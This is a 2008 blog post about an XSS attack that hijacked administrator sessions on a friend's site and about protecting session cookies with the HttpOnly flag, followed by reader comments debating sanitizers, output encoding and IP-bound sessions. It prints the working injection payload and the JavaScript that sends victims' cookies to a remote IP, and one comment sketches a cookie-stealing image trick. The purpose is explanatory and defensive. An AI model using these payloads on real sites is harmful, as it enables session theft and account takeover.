So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
&lt;script&gt;alert('hello XSS!');&lt;/script&gt;
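A minimal sketch of what such an encoder does, assuming plain JavaScript run under Node. The function name `htmlEncode` is made up for illustration, and encoding the two quote characters as well is a choice of this sketch (the example above leaves them alone); it only matters when the text lands inside an attribute value.

```javascript
// Minimal HTML encoder: replaces the five characters that can change
// how a browser parses text inside element content or quoted attributes.
function htmlEncode(text) {
  const entities = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

console.log(htmlEncode("<script>alert('hello XSS!');</script>"));
// prints: &lt;script&gt;alert(&#39;hello XSS!&#39;);&lt;/script&gt;
```

This is the easy case. It stops being enough as soon as some HTML has to be let through.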
In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;
That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have a browser that supports HttpOnly and implements it correctly.
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
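For anyone assembling that header by hand rather than through a framework setting, a rough sketch follows. The helper name `buildSetCookie` and its options object are hypothetical, and it deliberately handles only the two attributes visible in the response above.

```javascript
// Builds the value of a Set-Cookie header. Hypothetical helper that only
// knows about the path and HttpOnly attributes shown in the response above.
function buildSetCookie(name, value, options = {}) {
  const parts = [`${name}=${value}`];
  parts.push(`path=${options.path || "/"}`);
  if (options.httpOnly !== false) {
    parts.push("HttpOnly"); // on unless the caller explicitly opts out
  }
  return parts.join("; ");
}

console.log("Set-Cookie: " + buildSetCookie("user", "t=bfabf0b1c1133a822"));
// prints: Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
```

Making HttpOnly the default and forcing callers to opt out is the point of the sketch: the safe behavior should be the one you get without thinking. With Node's built-in http module, the resulting string would be passed to `response.setHeader("Set-Cookie", ...)`.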
This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here's what we know:
HttpOnly blocks script access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
HttpOnly hides cookie headers from XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
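The document.cookie behavior can be pictured with a toy model. This is not a browser API, just a sketch under the assumption that a cookie jar is a list of records with an `httpOnly` field; the `theme` cookie is invented for contrast.

```javascript
// Toy model of a browser cookie jar; not a real browser API.
const jar = [
  { name: "ASP.NET_SessionId", value: "ig2fac55", httpOnly: true },
  { name: "theme", value: "dark", httpOnly: false }, // hypothetical cookie
];

// What a page script reading document.cookie would see:
// HttpOnly cookies are filtered out.
function scriptVisibleCookies(cookies) {
  return cookies
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// What the browser attaches to a request back to the server: every cookie.
function requestCookieHeader(cookies) {
  return cookies.map((c) => `${c.name}=${c.value}`).join("; ");
}

console.log(scriptVisibleCookies(jar)); // prints: theme=dark
console.log(requestCookieHeader(jar));
// prints: ASP.NET_SessionId=ig2fac55; theme=dark
```

The server still receives the session cookie on every request; only script running in the page loses sight of it.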
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
Posted by Jeff Atwood
so, basically, HttpOnly-cookies protect you from your specific exploit and force the attacker to just redirect the users to a fake login on a page he controls or something similar.
If you allow arbitrary javascript on your site, it's not your site anymore. HttpOnly-cookie does not change that.
Live and learn. I made a simple comment system for a website and it basically just removes every character that could be used in a script attack when the data is posted back to the page. Essentially it doesn't let you use any HTML or other fancy stuff in the comment area so it's a bit limited in what you can display for a comment, but at the same time it's generally pretty secure (crosses fingers) and while comment spam happens at times whatever links are posted aren't ever active.
Harvey on August 28, 2008 12:55 PM
So has that convinced your 'friend' to not use a home baked HTML sanitizer?
:-) Excellent post.
Rich Lawrence on August 28, 2008 01:08 PM
For ASP.NET developers, note the property "httpOnlyCookies":
Score!
Rick on August 28, 2008 01:13 PM
Keppla, I came here to say the same thing - while this definitely does negate cookie theft, it does -not- negate the dangers of XSS as a rule.
There are many more things that XSS will open up as a vulnerability to your users.
This trick, while definitely useful, is treating the symptom and not the disease.
Chris Dary on August 28, 2008 01:13 PM
Interesting... it looks like the secondary page you go to if you forget the captcha causes the link to be submitted as an anchor, which causes it to get doubled up
http://msdn.microsoft.com/en-us/library/ms228262.aspx
Rick on August 28, 2008 01:15 PM
Good post, Jeff. Thanks for the information.
"Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!"
It wouldn't have totally protected the users though, would it? The attacker could have got the headers through XHR as stated, or perhaps some users were using Safari, which may or may not respect HttpOnly.
John Topley on August 28, 2008 01:22 PM
typo: s/bowser/browser/
Pedant on August 28, 2008 01:23 PM
Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access? Implement caching as necessary, bake at 350 degrees for 15 minutes, and, voila! Fewer XSS problems. I guess someone could still masquerade as someone else if they're on the same LAN behind the same router, but hey, you can actually go pummel that person for reallzies since they're probably physically pretty close to you.
Robert C. Barth on August 28, 2008 01:25 PM
This is one reason why I associate session cookies on the server side to the client address. This exploit could still be done, but the cookie would only be useful if they were also able to form a TCP connection from the same IP.
Jody on August 28, 2008 01:33 PM
um... I think this is a tad off...
First of all, any web developer worth his salt knows enough to not trust the session ID alone to identify a user... and if not, they need a swift 2x4 to the head.
Yes, you store the session ID in the cookie. On the server, you store the session ID, the username, the IP address of the user, the time of the login, etc. And you rotate this session ID every 15 minutes (or so) so old ones become invalid... if you see the same session ID used on 2 different IP addresses, you sound the god damn alarm.
HttpOnly is a nice extra layer for storing the session... but the real problem here is the fact that the session ID was not cryptographically strong in the first place.
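A rough sketch of the scheme this comment describes, assuming Node and an in-memory store. Every name here (`sessions`, `login`, `checkRequest`) is invented for illustration, and "sounding the alarm" is reduced to invalidating the session.

```javascript
const crypto = require("crypto");

const ROTATE_AFTER_MS = 15 * 60 * 1000; // "every 15 minutes (or so)"
const sessions = new Map(); // sessionId -> { username, ip, issuedAt }

function newSessionId() {
  // 32 random bytes from the OS CSPRNG, hex encoded
  return crypto.randomBytes(32).toString("hex");
}

function login(username, ip, now = Date.now()) {
  const sessionId = newSessionId();
  sessions.set(sessionId, { username, ip, issuedAt: now });
  return sessionId;
}

// Returns { ok, sessionId }; sessionId may be a rotated replacement
// that the server should send back in a fresh Set-Cookie header.
function checkRequest(sessionId, ip, now = Date.now()) {
  const session = sessions.get(sessionId);
  if (!session) return { ok: false, reason: "unknown session" };
  if (session.ip !== ip) {
    sessions.delete(sessionId); // same ID from another address: kill it
    return { ok: false, reason: "ip mismatch" };
  }
  if (now - session.issuedAt >= ROTATE_AFTER_MS) {
    sessions.delete(sessionId); // old ID becomes invalid on rotation
    return { ok: true, sessionId: login(session.username, ip, now) };
  }
  return { ok: true, sessionId };
}
```

Whether tying a session to one IP address is acceptable depends on the audience; users behind proxies or on roaming laptops will trip the mismatch branch without any attack taking place.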
bex on August 28, 2008 01:36 PM
Robert C. Barth said: "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?"
I'm surprised this isn't a standard practice... is there some gotcha to this I haven't thought of? I'm not a web developer myself, so there could be a simple "yeah but" to this solution.
Sometimes it's better to buy hardware to solve that problem. There are some firewall products that record what goes out versus what comes back cookie-wise and don't allow cookies to be added from the client side, prevent replay attacks, prevent injection attacks, etc. If you write software in layers, you should also think of layering access to your website.
There's a benefit that you reduce the load on your servers to legitimate requests, etc.
burnsy on August 28, 2008 01:48 PM
Yeah... special thanks, but let's not forget he's the same *modesty* that was so annoying that day... maybe he could have contacted you without screwing up the site first
Juan on August 28, 2008 01:50 PM
IP address doesn't help much either. The XSS can get the IP address and send it to the hacker, along with the cookie. Not too hard to spoof an IP address in an HTTP request (http://en.wikipedia.org/wiki/IP_address_spoofing), if you just want to send a command...
jorge on August 28, 2008 01:52 PM
it is really hard to escape HTML yourself. There are SO MANY ways to make an XSS attack string: http://ha.ckers.org/xss.html
jorge on August 28, 2008 01:54 PM
Now if only your friend would listen to the "white list don't black list" suggestion he could, with some consideration, avoid all XSS attacks.
Jonathan Moore on August 28, 2008 01:59 PM
>> "Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?"
People can still farm IP addresses and spoof them if you allow them to post external links: I post a link to a page, you click on it, the page saves the IP of your request and redirects you to a rick rolling page. I steal your session ID using the technique described above. Now what?
Leo Horie on August 28, 2008 02:03 PM
> "white list don't black list" suggestion
We do whitelist; our whitelist wasn't good enough. Think of the bouncer at a club door. If you're not on the list, you don't get in.
> So has that convinced your 'friend' to not use a home baked HTML sanitizer?
No, we just improved it. That's how code evolves. Giving up is lame.
Jeff Atwood on August 28, 2008 02:06 PM
Let me tell you a story.
The host name is made up, but everything else is true.
- PunBB stores the user name and the hashed password in the cookie. (It uses a different hash than the one in the DB.)
- acmeshell.inc users can have their homepages, with PHP.
Once upon a time, there was a forum at http://acmeshell.inc/forum/. (It has been moved to another server since then.) The forum used PunBB, and even though it was in /forum/, it would set cookies with a path of /.
Cookie path was /.
User homepages were at /~user/.
Guess what happened.
[img]/~joe/stealcookies.php?.jpg[/img]
No JavaScript was used.
grawity on August 28, 2008 02:10 PM
> Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder.
Really? Why not do your XSS encoding logic on the output instead? As far as input is concerned, I want to record what my users typed, exactly as they typed it, as a general principle. It helps in figuring out what happened, and prevents iffy data migrations if I change the encoding logic later. How I deliver output is a different matter, of course ;-)
awh on August 28, 2008 02:15 PM
I never liked the idea of HttpOnly for cookies as it prevents my favorite way of stopping another increasingly common class of attacks known as XSRF.
When HttpOnly is NOT enabled, a developer like myself can post the cookie as POST data in an AJAX request or whatever in order to show the server that the request came from the appropriate domain. It's usually called a double submitted cookie, and it's what allows applications like Gmail to ensure that the visitor who is making the request really is trying to make the request (as opposed to some evil site who is trying to grab a user's address book by including a script tag on the page that references the script dynamically generated on Google's server for that user). Another example of an actual XSRF that could have been prevented by using doubly-submitted cookies without HttpOnly can be found here: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/.
Anyway, like Chris Dary said above, "This trick, while definitely useful, is treating the symptom and not the disease."
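A minimal sketch of the server-side half of a double-submitted cookie, assuming Node. The function names are hypothetical, and this sketch uses a separate random token cookie rather than the session cookie itself, so the session cookie could still be marked HttpOnly; that is a variation on what the comment describes, not the commenter's exact setup.

```javascript
const crypto = require("crypto");

// Issue a random anti-XSRF token. The server sets it as a cookie that
// page script is allowed to read, so this cookie cannot be HttpOnly.
function issueToken() {
  return crypto.randomBytes(16).toString("hex");
}

// Server-side check: the token echoed in the request body must match
// the token the browser sent in the Cookie header. A page on another
// domain can trigger the request but cannot read the cookie to copy it.
function isDoubleSubmitValid(cookieToken, bodyToken) {
  if (typeof cookieToken !== "string" || typeof bodyToken !== "string") {
    return false;
  }
  const a = Buffer.from(cookieToken);
  const b = Buffer.from(bodyToken);
  // timingSafeEqual throws on unequal lengths, so check first
  if (a.length === 0 || a.length !== b.length) return false;
  return crypto.timingSafeEqual(a, b);
}
```

Note that an XSS hole on the same site defeats this check too, since injected script can read the token cookie just as legitimate script does.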
Andrew Mattie on August 28, 2008 02:15 PM
For people associating cookies with client IP: Remember that people want to use persistent cookies, and that people have laptops, which get different IPs depending on where they are. Also, some users are behind load-balancing proxies, which may appear to your site as different client IPs.
Jonathan on August 28, 2008 02:17 PM
What should users do to protect themselves?
MAS on August 28, 2008 02:21 PM
My knowledge of web design = 0
with that in mind, why the hell that is not the default for every single browser? Why would other people (websites) have to do with cookies from my website?
If there is a reason at all why not make HttpOnly default and create a little thing called NoHttpOnly?
Hoffmann on August 28, 2008 02:33 PM
The following is a must-read for all webappers: <a href="http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html">http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html</a>
Andy on August 28, 2008 02:38 PM
Hm. The submission ruined the post if you inserted the captcha incorrectly. Bug, mr Atwood? ;)
Anyway, here we go again:
http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html
MAS, inherently, if you trust a site to run Javascript on your machine for advanced features, you're trusting them to stay in control of their content. <a href="http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx">XSS filters are being added to newer browsers</a>, but I don't expect these intelligent blacklists to be very effective.
For sites you don't trust, <a href="https://addons.mozilla.org/en-US/firefox/addon/722">the Firefox NoScript extension</a> is solid web security--it disables rich content unless you explicitly enable it for a domain. You still have to decide whether to trust sites like Stack Overflow, but a lot of sites are still useful without Javascript. (I haven't enabled Coding Horror, for example.)
Braden on August 28, 2008 02:42 PM
Rather,
XSS filters: http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722
Well, yeah. That's what happens when you think a sanitiser should try and clean the input. Another approach is to run a full HTML parser and construct a DOM tree from the document. Filter said DOM tree. Regenerate HTML from this tree.
Valid HTML will get through unscathed. Slightly incorrect but harmless HTML may even end up fixed. Bad will either end up filtered out of the DOM tree or so mangled that the XSS attack won't work (trickery like what's just given will fall flat and probably turn into <img src=""> )
Anon on August 28, 2008 02:53 PM
Giving up is "lame"? Well, I don't want to be lame! So there's no way I'll give up on my reimplementation of the OS, compiler, web browser, and I won't even consider giving up on the rewrite of everything I've ever done!
Also, "giving up is lame" is the worst excuse I've ever heard for the "not invented here" syndrome. No one said software is a crime against humanity - but it's actually not always necessary or appropriate to write everything from scratch.
Bob on August 28, 2008 02:54 PM
"Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder."
I don't know if you worded this poorly or if this is actually what you're doing. But that's not the first thing you do when you accept input. It's the *last* thing you do *before you output* said input to a HTML page.
correct on August 28, 2008 02:59 PM
Following on from my last comment:
If you wrote this blog software that way then that's probably why Andy's link is garbled up above.
correct on August 28, 2008 03:16 PM
Nah. You should be using a proper templating engine that doesn't allow "leaking" of data into markup (e.g. XSLT or TAL)
kL on August 28, 2008 03:21 PM
That's what you get for posting your sanitizer on refactormycode then. Closed source wins! ;-) j/k
Odd Rune on August 28, 2008 03:29 PM
I don't get it. You had a sanitizer, yet somehow those angle brackets weren't encoded by it? How can a search-and-replace fail?
Jonas on August 28, 2008 03:49 PM
That's what Regex is for, isn't it?
There's no way that the above input would pass my Regex filters, which obviously contains "</?script". Be sure to check for octal syntax as well, because that's much harder but equally valid.
PRMan on August 28, 2008 03:52 PM
So, some guy out there has stolen the identities of everyone trying the SO beta?
Leonardo on August 28, 2008 04:29 PM
I see a bunch of misinformation and misunderstandings flying around here.
First, HTTP connections are over TCP, not UDP. That means the IP address of an HTTP connection can not readily be spoofed against any system with good TCP sequence number randomization, which in turn means unless your server is running on some absolutely ancient OS they should not be spoofable. IP spoofing over UDP = easy, IP spoofing over TCP = hard. That means that it would indeed be useful to encode the IP address as part of the session cookie.
Second, to Jeff: Is your core intent here to build a working website, or to show the world what a macho programmer you are? If it's the former, you damn well should be building on solid components, and you certainly should consider a well-tested input validator and sanitizer as one of them, if you could find a suitable one.
Third, the concept of "input sanitizer" is highly questionable, as a couple people said; this is a good example of why. Trying to helpfully clean up toxic input goes right along with trying to remove that virus from the application document before you pass it along to the user. Don't sanitize bad input; reject it (preferably handling it with gloves and tongs in the process.)
Fourth, even input validation should be based on matching and accepting a limited (as in brain-dead-simple) subset of valid constructs, not on attempting to match and reject invalid constructs. Anything which doesn't clearly match a limited set of valid values should be tossed (or in a posting context, fed back to the sender with an invitation to correct it.)
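One way to read "accept a limited subset" in code, sketched under loud assumptions: this is not the sanitizer discussed in the post, the tag list is invented, and it swaps in a deliberately crude technique (encode everything, then re-enable exact, attribute-free tags) in place of a real HTML parser.

```javascript
// Hypothetical whitelist; none of these tags may carry attributes.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "code", "pre", "blockquote"];

function htmlEncode(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Step 1: encode every special character, so nothing is live markup.
// Step 2: turn back only the exact encoded forms of whitelisted tags.
function sanitize(input) {
  let out = htmlEncode(input);
  for (const tag of ALLOWED_TAGS) {
    out = out
      .split(`&lt;${tag}&gt;`).join(`<${tag}>`)
      .split(`&lt;/${tag}&gt;`).join(`</${tag}>`);
  }
  return out;
}

console.log(sanitize("<b>bold</b> <script>alert(1)</script>"));
// prints: <b>bold</b> &lt;script&gt;alert(1)&lt;/script&gt;
```

Anything that is not an exact match stays encoded, so the default is rejection. The sketch does not balance tags, and it cannot express links or images at all; allowing those safely is where the real difficulty starts.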
There is a lot of well-developed and hard-earned wisdom about how to write security-conscious software. It starts with learning about the topic, and then not rejecting basic principles because "I want to do it my way!"
You're expecting a lot of people to trust you here; time to step up and live up to that trust.
Clifton on August 28, 2008 04:56 PM
>> No, we just improved it. That's how code evolves. Giving up is lame.
Please share the code.
Firefox has a bug and cookies are still dangerous. What else is new?
When will somebody break down and fix the Internet (create a new one)? Probably when somebody breaks down and creates a new engine that is better than gasoline.
The ideas and the resources are there, but how can you change something billions of people are already benefitting from?
Josh Stodola on August 28, 2008 05:17 PM
It's an excellent idea, and provides a bit of secondary protection if you're not confident you've eliminated all the XSS vulnerabilities. But unfortunately the XHR workaround you provided renders it completely worthless.
It's always nice to hear about obscure things like that (especially when written so eloquently), but that's not a useful security measure. Even the 10 minutes it would take to implement it would be better spent checking your code for potential problems.
So, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow focus for the blog. :)
wds on August 28, 2008 06:09 PM
@bex you just screwed anyone who sits behind a proxy server. IP alone isn't enough, and your web server is too high a layer to be effective at spotting all the ways to spoof.
With a site like SO, it's going to be far more difficult to build a sanitizer, because there will be legitimate content, etc, that has <script blah> tags. That in itself is a reason to create your own markup syntax (or borrow wiki's) because that way it's easier to verify and reject content without losing sight of the trees for the forest.
With normal punter content, I strip anything remotely looking like markup because it's not in the spec. Also most users want to use angle brackets in their normal sense, so a dead simple catch-anything is just encode all angle brackets and ampersands and store it that way. &lt; &gt; &amp;. Spec changes and they want links, allow it via something like BBCode [url][/url], my sanitizer doesn't need to change, and I can validate/display only what I want to allow.
I still say that HTML/XML creators made one of the biggest WTF's by reuse of ultra-common symbols as the basis for the one format to rule them all.
As a final point, it's really hard when you have a small team trying to thwart a legion of bored 16-year-olds. In some ways it's good, because DRM will never succeed because of them, in other ways it sucks when you're trying to figure out what some little script kiddie did to deface your site.
O''Malley on August 28, 2008 06:17 PM
@omalley
"Also most users want to use angle brackets in their normal sense, so a dead simple catch-anything is just encode all angle brackets and ampersands and store it that way."
If you're also creating your final HTML files when you "store it" then OK. Otherwise you're doing this the wrong way around. Read my comments above, as well as others'.
You want to escape for HTML only when the data is being put into a HTML document.
Similarly, you want to escape for SQL when the data is being put into an SQL query.
In normal circumstances, you don't STORE the escaped data.
correct on August 28, 2008 07:02 PM
> I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds".
He was right. Instead of stealing document.cookie, xss.js could have set up a proxy/shell/tunnel allowing the attacker to take advantage of your friend's site using his own browser.
Jesse Ruderman on August 28, 2008 07:47 PM
@correct, it all depends, and I don't see the problem with storing escaped data. It's a space tradeoff I'm willing to make, but where I feel the penalty for failure is less severe. I'm pessimistic and nowhere near perfect, so I will forget now and again despite best efforts.
If you don't allow unsafe characters, then just completely remove them from input. Done
If you do allow unsafe characters, there are two scenarios
1. you store user input verbatim, and you always remember to escape when displaying output, and you hope input cleaning works 100%.
2. you store user input escaped, and you need to remember to unescape when your user is editing.
Penalty for failing in (1) - where you forget to escape, you expose your users to xss, etc.
Penalty for failing in (2) - editable has your escaped content &lt; &gt; &amp; etc. - looks stupid, but still safe.
Performance penalty in (1) is continual escaping on every view.
Performance penalty in (2) is only escaping / unescaping when edited.
(2) isn't perfect, but I'll take the hit, trusting the team to get the few edit scenarios correct versus the 100's of view scenarios correct. I call it erring on the side of caution.
Is there something I've overlooked? What is your objection to storing escaped data?
O''Malley on August 28, 2008 08:06 PM
Restricting your cookie based on IP address is a bad idea, for two reasons:
An IP address can potentially have a LOT of users behind it, through NAT and the likes. There's even a few ISPs that I've known to do this.
And secondly, your site breaks horribly for users behind load balancing proxies (larger organisations, or even the "tor" anonymising proxy).
Pete on August 28, 2008 08:26 PM
Anyone remember when Yahoo! messenger used to allow javascript (through IE i guess)? I used to type simple little bits like instant unlimited new windows or alerts to mess with my friends... thinking back on that, that's just scary!
Jesse on August 28, 2008 11:43 PM
On the same subject from J2EE perspective:
Zbigniew on August 28, 2008 11:48 PM
Once again with a fixed URL :)
http://gustlik.wordpress.com/2008/06/20/cross-site-scripting-and-httponly-attribute/
Zbigniew on August 28, 2008 11:49 PM
Well done Jeff. XSS, yeah, yeah, yeah. Not my site. HA. Just found a hole and implemented httpOnly. Thanks for this reminder!
DJ Burdick on August 28, 2008 11:59 PM
Unfortunately, as with any other feature that is browser-specific or too recent, we might as well acknowledge httponly for a second and then completely forget about it because it's totally useless ... the usual web development nightmare: we're stuck with the narrowest common set of features :-(
Okay, HttpOnly is an easy temporary fix, but we all know where such tempting temp fixes lead us, right? I'm sure we all agree here it's not a substitute for sanitizing, but guess what happens in the real world ...
Vincent on August 29, 2008 01:05 AM
If you're allowing people to use the image tag to link to untrusted URLs, you are already OWNED.
For starters it allows a malcontent to cause people's browsers to GET any arbitrary URL, fucking with non-idempotent websites, doing DDOS, whatever.
On top of that, for both IE and Opera, if they GET an URL in an img tag, and find it to be javascript, THEY EXECUTE IT. The script tag was totally unnecessary in that hack for targeting IE and Opera.
Fred Blasdel on August 29, 2008 01:12 AM
> No, we just improved it. That's how code evolves. Giving up is lame.
Giving up on idiotic idea is generally considered *wise*.
xxx on August 29, 2008 03:07 AM
HttpOnly should be the default. Making security easily accessible (instead of an "obscure feature", as one of the commenters called it) and secure behaviour the default is an essential part of security-aware applications.
But as is typical with IE, providing safe defaults would need some sites to update their code, so unsafe is default, and no one updates their code to add safety. (Why should they? It still works, doesn't it?)
As for sanitising input: Since input data is supposed to be a structured markup, I agree with other commenters that the very first thing should be to parse it with a fault-tolerant parser (not a HTML encoder as someone else suggested) in order to get a syntactically valid canonical representation. This alone already thwarts lots of tricks, and filtering is so much more robust on a DOM tree than on some text blob. Not easier, but no one said security was easy.
And such a DOM tree nicely serializes to something which has all <img src="..."> attribute values quoted etc., at least if your DOM implementation is worth its salt. (I recommend libxml, bindings available for practically every language)
Moe on August 29, 2008 04:45 AM
What I do not understand is why the browser is rendering that invalid HTML block.
Also the web application should validate the input and check if it's valid HTML/XHTML and uses only the allowed tags and attributes. Moe and others seem to be thinking of the same thing.
Cristian on August 29, 2008 05:13 AM
as mentioned before the sanitiser is clearly written badly. I'd bet it's overly complicated in order to fail on this example (something to do with nesting angle brackets? why do you even care how they are nested if you are just encoding them differently?)
further, the cookies are being used naively "out of the box". how about encrypting the data you write to them based on the server ip or something similar so that these tricks can't work?
HttpOnly by default would still be good though... you have to protect the bad programmers from themselves when it comes to anything as accessible as web scripting.
i'm also in favour of storing the data already sanitised. doing it on every output is one of those "everything is fast for small n" scenarios, and it removes the risk of forgetting to re-sanitise the code somewhere.
jheriko on August 29, 2008 05:22 AM
Is there a good existing sanitizer for ASP.NET?
Helen on August 29, 2008 05:25 AM
Great post, I totally agree about the need to protect cookies.
I've been using NeatHtml by Dean Brettle for protection against XSS for quite a while now and I think it's the best available solution, though I admit I have not looked closely at the Html Sanitizer you mentioned.
http://www.brettle.com/neathtml
Best Regards,
Joe Audette
Joe Audette on August 29, 2008 05:30 AM
Another barrier that is frequently used with applications that must accept user-generated HTML is to separate cookie domains: put sensitive pages on a separate origin from the user-generated content. For example, you could have admin.foo.com and comments.foo.com. If sensitive cookies are only setup for domain=admin.foo.com, an XSS on comments.foo.com won't net anything useful.
Aaron on August 29, 2008 05:38 AM
So that's what you've been so busy working on since your last post? Makes me glad I'm wracking my brain with WPF and XAML instead of Web 2.0 stuff.
Jeff Schwandt on August 29, 2008 05:45 AM"No, we just improved it. That's how code evolves. Giving up is lame."
When you find yourself at the bottom of a hole it's best to stop digging.
Also what Mr Blasdel said.
Uh, couldn't someone just filter the response from the server to remove the httpOnly flag? It seems very half-assed to use a feature that is client-side, in SOME browsers. This is a circumstance where it's important enough to come up with a solution that isn't just more obfuscated, but that actually increases the security by an order of magnitude.
Just my opinion.
SuperJason on August 29, 2008 05:46 AMSo instead of actually fixing the problem (by, say, using a real HTML parser/sanitizer and getting rid of scripts), you've chosen to put on a second band-aid which doesn't even work the way it's supposed to half the time.
Well played. Don't bother trying to cure the disease, just treat the symptoms.
This is proof positive of the importance of creating a good design at the very beginning. Not only is it hard to fix mistakes in the design later on, but developers and geeks in general are ridiculously stubborn and can't bear the idea of having made a serious mistake; they'd rather just patch it up one way or another, until the patch fails and they have to make another patch, and so on and so forth. Not a good situation.
Aaron G on August 29, 2008 05:54 AMQuite an eye opener; thanks Jeff. Also, WTF, when are you going to accept me as a beta user?!
Gio on August 29, 2008 06:02 AMI'm not sure why you people are being so hard headed. He didn't say that he didn't ALSO fix the sanitizer. But like all things in web security adding the HttpOnly flag raises the bar. Why not do it? He isn't advocating using HttpOnly in lieu of other good security measures.
As for sanitizing input versus output I prefer to sanitize output. There are too many other systems downstream that are impacted by sanitizing the input. I write enterprise systems, not forums. There is a big difference. I can't pass a company name of Smith%27s%20Dairy to some back end COBOL system. They wouldn't know what to do with it.
For those of you that decide to sanitize your input, it must be nice to write web applications that live in a vacuum...
Matt on August 29, 2008 06:16 AMThe Web needs an architectural do-over.
